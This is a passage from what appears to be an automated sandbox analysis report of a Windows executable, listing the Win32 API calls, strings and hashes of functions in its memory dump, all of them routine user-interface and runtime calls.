                                                                                • Opcode ID: 8ae2271a3a4097cf723e239de0f2510a8592ef92536d4c84d7ccbf5cae9fe13a
                                                                                • Instruction ID: 32d28a0328c911aa789c3a8b61bcb6f17f3a48022283877fa74d473a050a59d9
                                                                                • Opcode Fuzzy Hash: 8ae2271a3a4097cf723e239de0f2510a8592ef92536d4c84d7ccbf5cae9fe13a
                                                                                • Instruction Fuzzy Hash: AF02A774A00209DFCB04CF98C994AEEBBB5FF48315F248269E905AB395C775E982CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetPropA.USER32 ref: 00429125
                                                                                • CallWindowProcA.USER32 ref: 0042914D
                                                                                  • Part of subcall function 00426C80: CallWindowProcA.USER32 ref: 00426CA6
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CBE
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CCA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Prop$CallProcRemoveWindow
                                                                                • String ID:
                                                                                • API String ID: 2276450057-0
                                                                                • Opcode ID: 669b97bf8b33443c3aa8efd9cba5932e0f436216a5dc825d0a20318bd30a7f03
                                                                                • Instruction ID: fd2f8a0f68b694065fac5a57c64d99df18ca824769472e37806bd5fbe8e54d78
                                                                                • Opcode Fuzzy Hash: 669b97bf8b33443c3aa8efd9cba5932e0f436216a5dc825d0a20318bd30a7f03
                                                                                • Instruction Fuzzy Hash: A4613B72744320BBE2209B55FC49FAF7758EB86772F50052AFD00973D1DA299D0182BE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0043193C: TlsGetValue.KERNEL32(0044DC44,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4,?,00000000,?,0042A17C,00000000,00000000,00000000,00000000), ref: 0043197B
                                                                                • CallNextHookEx.USER32 ref: 0042B5BB
                                                                                • GetClassLongA.USER32(?,000000E6), ref: 0042B602
                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 0042B62E
                                                                                • lstrcmpiA.KERNEL32(?,ime,?,?,?,Function_00030872), ref: 0042B63D
                                                                                • GetWindowLongA.USER32 ref: 0042B6B0
                                                                                • SetWindowLongA.USER32(?,000000FC,00000000), ref: 0042B6D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
                                                                                • String ID: AfxOldWndProc423$ime
                                                                                • API String ID: 3731301195-104836986
                                                                                • Opcode ID: 02dafad50929403a0e9e0b30e21fff90a4ed255024f12e0c70b5e73fa4258cac
                                                                                • Instruction ID: ddcc6b038d501befeebe275d504f36c0ca086ce6f4371d20e35bbca7eaf78405
                                                                                • Opcode Fuzzy Hash: 02dafad50929403a0e9e0b30e21fff90a4ed255024f12e0c70b5e73fa4258cac
                                                                                • Instruction Fuzzy Hash: B351A331600225AFCB119F65EC48B6B7BB8FF44355F508526F916AB291CB78DA40CBD8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                • String ID: ($@
                                                                                • API String ID: 808654186-1311469180
                                                                                • Opcode ID: c732cfaa1f0a8cd1759c9fa9721c240d1752357aae8708fea36687dd9dbcd0bb
                                                                                • Instruction ID: c69e3e10dc8f0aa7acf604fe3ee190bed53639fffb1c83ac38c4b4b6df4aabeb
                                                                                • Opcode Fuzzy Hash: c732cfaa1f0a8cd1759c9fa9721c240d1752357aae8708fea36687dd9dbcd0bb
                                                                                • Instruction Fuzzy Hash: 77515471E00229ABDB10DFA8EC85EEEBBB9AF44314F554116F901F7290DA34ED06CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(USER32,00000000,?,73FD5D80,00421A50,?,?,?,?,?,?,?,0042D0C3,00000000,00000002,00000028), ref: 00421939
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00421951
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00421962
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00421973
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00421984
                                                                                • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00421995
                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004219A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                • API String ID: 667068680-2376520503
                                                                                • Opcode ID: 50c626119172fd31b313bea65e3c89444c3e274db35bc2a29e343c46cc6c2576
                                                                                • Instruction ID: a85f0fd6c7e6c8be5f541268c400f8f269d0b15cfe923c488f4b61260bdda861
                                                                                • Opcode Fuzzy Hash: 50c626119172fd31b313bea65e3c89444c3e274db35bc2a29e343c46cc6c2576
                                                                                • Instruction Fuzzy Hash: DA1151B4F40224DAA321BF26ACD5A3ABAF0B61AB407A4093FE115D22A0C7785485CF1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0044E660,73FD2D10,76D52E90,?,?,?,?,?,?,?,?,?,?,?,?,00427047), ref: 00427A47
                                                                                • GetProfileStringA.KERNEL32(windows,kanjimenu,roman,?,00000009), ref: 00427A70
                                                                                • lstrcmpiA.KERNEL32(?,kanji,?,?,?,?,?,?,?,?,?,?,?,?,00427047), ref: 00427A82
                                                                                • GetProfileStringA.KERNEL32(windows,hangeulmenu,english,?,00000009), ref: 00427AA5
                                                                                • lstrcmpiA.KERNEL32(?,hangeul,?,?,?,?,?,?,?,?,?,?,?,?,00427047), ref: 00427AB1
                                                                                • LeaveCriticalSection.KERNEL32(0044E660,?,?,?,?,?,?,?,?,?,?,?,?,00427047), ref: 00427AC3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalProfileSectionStringlstrcmpi$EnterLeave
                                                                                • String ID: english$hangeul$hangeulmenu$kanji$kanjimenu$roman$windows
                                                                                • API String ID: 1105401458-111014456
                                                                                • Opcode ID: 04f458f2761271753607e0c3fa666cbcf156a6e141198ef81c26a9ff78827e52
                                                                                • Instruction ID: 52780afb9afab5b7d77386e9c09488af12e4d7a6f163db323987893dde90b72e
                                                                                • Opcode Fuzzy Hash: 04f458f2761271753607e0c3fa666cbcf156a6e141198ef81c26a9ff78827e52
                                                                                • Instruction Fuzzy Hash: 1701F73568430AB9F6109B64EC06FDB3F98DBD9B01F700036F60092192E7A8D60886EE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Prop$Window$ClassLongNameUnicodelstrcmpi
                                                                                • String ID: edit
                                                                                • API String ID: 4088303749-2167791130
                                                                                • Opcode ID: 9344946788155270f6c6f623a1f3b4d8015b2ecad03aca42361679214239855b
                                                                                • Instruction ID: a0fca1982c1711c014e0ba9bd34a4dcc5d753ed13ef0219f952b0f76b307e544
                                                                                • Opcode Fuzzy Hash: 9344946788155270f6c6f623a1f3b4d8015b2ecad03aca42361679214239855b
                                                                                • Instruction Fuzzy Hash: 6921967A30153269A7516B39AC04FFB2AACAF69744B820575FD14C1120F728DA428B7D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?), ref: 00429F14
                                                                                • GetProcAddress.KERNEL32(00000000,DisableThreadLibraryCalls), ref: 00429F20
                                                                                • EnterCriticalSection.KERNEL32(0044E660), ref: 00429F3C
                                                                                • GetVersion.KERNEL32 ref: 00429F4E
                                                                                • GetSystemMetrics.USER32 ref: 00429F92
                                                                                • GetSystemMetrics.USER32 ref: 00429F9C
                                                                                • GetSystemMetrics.USER32 ref: 00429FA6
                                                                                • GetSystemMetrics.USER32 ref: 00429FAF
                                                                                • LeaveCriticalSection.KERNEL32(0044E660), ref: 00429FBB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MetricsSystem$CriticalSection$AddressEnterHandleLeaveModuleProcVersion
                                                                                • String ID: DisableThreadLibraryCalls$KERNEL32.DLL
                                                                                • API String ID: 1414939872-3863293605
                                                                                • Opcode ID: 662bee427edc3f34452231349272ca85c4d050feee4c676387a86ec6b22f0360
                                                                                • Instruction ID: 650d44db805d81423b400fa670bcbe809f28716c44ccb6f200b0172be402ee5f
                                                                                • Opcode Fuzzy Hash: 662bee427edc3f34452231349272ca85c4d050feee4c676387a86ec6b22f0360
                                                                                • Instruction Fuzzy Hash: 23117C74A50725EAEB50AF31ED0965B3EA0FB12702F91443AF945972A0D7799808CF8E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetParent.USER32(FFFFFDA7), ref: 004214F8
                                                                                • GetWindow.USER32(?,00000005), ref: 0042155F
                                                                                • GetWindow.USER32(?,00000002), ref: 00421570
                                                                                • IsWindow.USER32(?), ref: 00421583
                                                                                • GetClassNameA.USER32(?,?,00000040), ref: 00421597
                                                                                • lstrcmpiA.KERNEL32(?,ToolbarWindow32), ref: 004215A6
                                                                                  • Part of subcall function 00401643: _Smanip.LIBCPMTD ref: 00401690
                                                                                  • Part of subcall function 00401643: _Smanip.LIBCPMTD ref: 004016AA
                                                                                  • Part of subcall function 00401643: _Smanip.LIBCPMTD ref: 004016D8
                                                                                  • Part of subcall function 00401C16: GetDlgItem.USER32 ref: 00401C38
                                                                                  • Part of subcall function 004027B4: GetWindowRect.USER32 ref: 004027C8
                                                                                  • Part of subcall function 004027B4: _Smanip.LIBCPMTD ref: 004027DF
                                                                                • MoveWindow.USER32(?,00000000,00000000,00000000,00000000,00000001,00000001,00000002,00000064,00000064,00000000,00000000,00000001,00000064,00000064,00000000), ref: 004216F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Smanip$ClassItemMoveNameParentRectlstrcmpi
                                                                                • String ID: N$N$C$ToolbarWindow32
                                                                                • API String ID: 1368478647-1726087458
                                                                                • Opcode ID: 8803b2e75d736782df9a6ab042f3a2b034ff12d42b343225a82b35c8a4189531
                                                                                • Instruction ID: 087d61ecbdf7d91e9e1061ab5d20a948f0193d1da4d5f2b7d88476c8263a4c1a
                                                                                • Opcode Fuzzy Hash: 8803b2e75d736782df9a6ab042f3a2b034ff12d42b343225a82b35c8a4189531
                                                                                • Instruction Fuzzy Hash: 58810B70B80315ABEB24DF94CD46FAEB7B5AB48704F204169F6057B2D1C7B9AD40CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 0042A752
                                                                                • GetSystemMetrics.USER32 ref: 0042A804
                                                                                • GlobalLock.KERNEL32 ref: 0042A88E
                                                                                • CreateDialogIndirectParamA.USER32(?,?,?,0042A595,00000000), ref: 0042A8C0
                                                                                  • Part of subcall function 0042EA11: InterlockedDecrement.KERNEL32(-000000F4), ref: 0042EA25
                                                                                • DestroyWindow.USER32(00000000,?,?,?,00000000,?,?), ref: 0042A937
                                                                                • GlobalUnlock.KERNEL32(?,?,?,?,00000000,?,?), ref: 0042A948
                                                                                • GlobalFree.KERNEL32 ref: 0042A951
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
                                                                                • String ID: Helv$MS Sans Serif$MS Shell Dlg
                                                                                • API String ID: 2343056566-2894235370
                                                                                • Opcode ID: e29a325b15985961ae5d1a6553ec1f891997f50d40e93e755d5080d86f0b4f75
                                                                                • Instruction ID: 2770577b83cc1c954c61eca1fee551e966a6576e53e849b91b116d6b17df0bd8
                                                                                • Opcode Fuzzy Hash: e29a325b15985961ae5d1a6553ec1f891997f50d40e93e755d5080d86f0b4f75
                                                                                • Instruction Fuzzy Hash: 0A61B571A0021ADFCF14EF95E9459EEBBB1FF04304F50442FF901A2291DB788A51CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004282A7
                                                                                • EnterCriticalSection.KERNEL32(0044E660), ref: 004282B4
                                                                                • LeaveCriticalSection.KERNEL32(0044E660), ref: 004282FC
                                                                                • CallNextHookEx.USER32 ref: 00428313
                                                                                • LeaveCriticalSection.KERNEL32(0044E660), ref: 0042832E
                                                                                • GetWindowLongA.USER32 ref: 00428372
                                                                                • SendMessageA.USER32 ref: 00428399
                                                                                • GetParent.USER32(?), ref: 00428401
                                                                                • CallNextHookEx.USER32 ref: 0042843E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalSection$CallHookLeaveNext$CurrentEnterLongMessageParentSendThreadWindow
                                                                                • String ID: D
                                                                                • API String ID: 1151315845-193714618
                                                                                • Opcode ID: d184fad9f60f6af29302dbd4668d7c930e313be64ce23e937a0726a6fbe5983a
                                                                                • Instruction ID: 63be24607ec99edc481cb90af060114fbf7ded4d5f6f736c22a7f660fe76b1ae
                                                                                • Opcode Fuzzy Hash: d184fad9f60f6af29302dbd4668d7c930e313be64ce23e937a0726a6fbe5983a
                                                                                • Instruction Fuzzy Hash: AA41CC71A052259BE710EF21FC49A2F73A8FB65715F84403EF90192251EB79E908CB6E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetPropA.USER32 ref: 004298C4
                                                                                • CallWindowProcA.USER32 ref: 004298E9
                                                                                  • Part of subcall function 00426C80: CallWindowProcA.USER32 ref: 00426CA6
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CBE
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CCA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Prop$CallProcRemoveWindow
                                                                                • String ID:
                                                                                • API String ID: 2276450057-0
                                                                                • Opcode ID: 4ddc7f21561b2aa00eaee5d9b4422749ecd863d78ff08ae6a9030780929e0961
                                                                                • Instruction ID: bfd8e66c31ac7e4bfb8ab2edef9ac1fa8bd8270a8bb0c000e7ae4ac2eee0e6ef
                                                                                • Opcode Fuzzy Hash: 4ddc7f21561b2aa00eaee5d9b4422749ecd863d78ff08ae6a9030780929e0961
                                                                                • Instruction Fuzzy Hash: C651BFB6A00220BFD210DB45EC84D7BB7B8EBC9721F84452EF95583300E7399C8587A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ObjectSelect$MessageRectSend$ClientLongModeOffsetParentWindow
                                                                                • String ID:
                                                                                • API String ID: 3606012576-0
                                                                                • Opcode ID: 42cded252f3ae2dfd680362d6e69f017d48515f24c1649d2a5cbf5e630380823
                                                                                • Instruction ID: 21a4dd910e7e8fdce9542383382d5eca9d1c13b710525b8bd0915806ce359b0a
                                                                                • Opcode Fuzzy Hash: 42cded252f3ae2dfd680362d6e69f017d48515f24c1649d2a5cbf5e630380823
                                                                                • Instruction Fuzzy Hash: 534127723043057BD210AB54BC46F7F73ACEB85B25FC4052EFB0196182DB69DA0587BA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindowLongA.USER32 ref: 0042739D
                                                                                • RemovePropA.USER32 ref: 004273D3
                                                                                • SetWindowLongA.USER32(?,000000FC,00000000), ref: 004273D9
                                                                                • RemovePropA.USER32 ref: 00427407
                                                                                • SetWindowLongA.USER32(?,000000FC,00000000), ref: 0042740D
                                                                                • GetWindow.USER32(?,00000005), ref: 00427462
                                                                                • GetWindow.USER32(00000000,00000002), ref: 00427473
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Long$PropRemove
                                                                                • String ID:
                                                                                • API String ID: 3256693057-0
                                                                                • Opcode ID: 04f2fe13007905304d3eec2a85775694bc2d561c817aedb675e05a16a13245b6
                                                                                • Instruction ID: 5fd58ad0cea725002760742ac6ec83ef97c00a649ea109c367f7e5d8bda159df
                                                                                • Opcode Fuzzy Hash: 04f2fe13007905304d3eec2a85775694bc2d561c817aedb675e05a16a13245b6
                                                                                • Instruction Fuzzy Hash: A321372A3194326AD701B735BC40EBF269CEF56765B928136FD00D2251FB289D03877D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00422CE5), ref: 004247BA
                                                                                • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00422CE5), ref: 004247CE
                                                                                • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00422CE5), ref: 004247FA
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00422CE5), ref: 00424832
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00422CE5), ref: 00424854
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00422CE5), ref: 0042486D
                                                                                • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00422CE5), ref: 00424880
                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004248BE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
